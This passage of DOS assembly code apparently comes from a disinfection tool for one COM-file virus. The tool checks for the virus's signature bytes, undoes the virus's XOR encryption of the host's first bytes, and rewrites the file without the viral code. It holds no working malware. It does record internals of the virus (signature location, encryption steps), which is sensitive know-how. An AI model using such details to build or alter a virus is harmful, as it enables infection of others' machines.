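        cmp     word ptr [di-969],SIG_UE   ; 'ue' at virus offset 2
        jnz     nov
        cmp     byte ptr [di],JMP_OPCODE   ; the virus keeps E9h as its last byte
        jnz     nov
        DISPSTR MSG2
        lea     si,Buffer
        mov     ax,[di-2]               ; encrypted host bytes 1-2
        xor     ax,JMP_KEY
        xor     [si+1],ax               ; undo, exactly as the virus does at 0412-0419
        mov     al,[di-3]               ; encrypted host byte 0
        xor     al,HDR_KEY
        xor     [si],al                 ; undo, exactly as the virus does at 0409-040F

        mov     ax,3c00h                ; re-create (truncates); attributes are restored at `done`
        xor     cx,cx
        lea     dx,FNAME+2
        int     21h
        jc      wrerr
        mov     bx,ax
        mov     ah,40h                  ; write back only the host part
        mov     cx,NUMB2
        lea     dx,Buffer
        int     21h
        jc      wrerr_c
        cmp     ax,NUMB2                ; partial write counts as failure
        jnz     wrerr_c
        mov     ah,3eh
        int     21h
        DISPSTR MSG3
        jmp     done

no:     mov     bx,HANDLE               ; handle still open on this path
        mov     ah,3eh
        int     21h
nov:    DISPSTR MSG1
        jmp     done

wrerr_c: mov    ah,3eh                  ; close the half-written new file (BX = its handle)
        int     21h
wrerr:  DISPSTR MSG5                    ; the file is already truncated; Buffer still holds the cleaned image
        jmp     done

toobig: mov     bx,HANDLE
        mov     ah,3eh
        int     21h
        DISPSTR MSG6
        jmp     done

readerr: mov    bx,HANDLE
        mov     ah,3eh
        int     21h
        DISPSTR MSG4
        jmp     done

err1:   DISPSTR ERROR                   ; open failed after the attributes were cleared
done:   mov     ax,4301h                ; put the original attributes back
        mov     cx,ATTR
        lea     dx,FNAME+2
        int     21h
        jmp     exit

err:    DISPSTR ERROR                   ; nothing was changed, so nothing to restore
exit:   mov     ax,4c00h
        int     21h
Buffer  db      0                       ; file image; extends to the end of the segment
MAIN    ENDP
CODE    ENDS
        END     MAIN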